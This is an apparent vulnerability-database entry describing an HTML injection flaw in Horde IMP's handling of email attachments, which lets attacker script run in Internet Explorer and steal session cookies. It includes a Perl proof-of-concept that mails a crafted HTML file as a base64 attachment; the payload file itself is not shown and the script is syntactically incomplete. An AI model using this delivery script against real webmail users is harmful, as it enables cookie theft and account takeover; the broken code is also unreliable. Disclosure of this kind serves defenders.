Horde IMP 2.2.x/3.2.x/4.0.x Email Attachments HTML Injection Vulnerability

ID SSV:80365
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.

                                                source: http://www.securityfocus.com/bid/15730/info

Horde IMP is prone to an HTML injection vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content.

Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible.

Reports indicate this issue is only present when viewing IMP content with the Microsoft Internet Explorer Web browser. 

# MIME::Liet SMTP client by C3PO
   use strict;
   use MIME::Base64;
   use MIME::Lite;
#                    load_file
   sub load_file{
      my($file) = shift;
      open(IN, $file) || die("Can't open $file $!");
      binmode IN;
      read(IN, $Body, -s $file);
      return $Body;
#                      main
   my $c = load_file('\Xploits\horder\passed.htm'); #content
   my $m = MIME::Lite->new(
                 From    =>'mail@domain.zone',
                 To      =>'mail@domain.zone',
                 Subject =>'Horde',
                 Date    =>"Tue, 17 Dec 2002 22:00:02 +0300",
                 Type    =>"text/html",
                 Data    => $c,
                 Encoding =>'base64'
  $m->attr('content-type.charset' => 'windows-1251'); #not necessary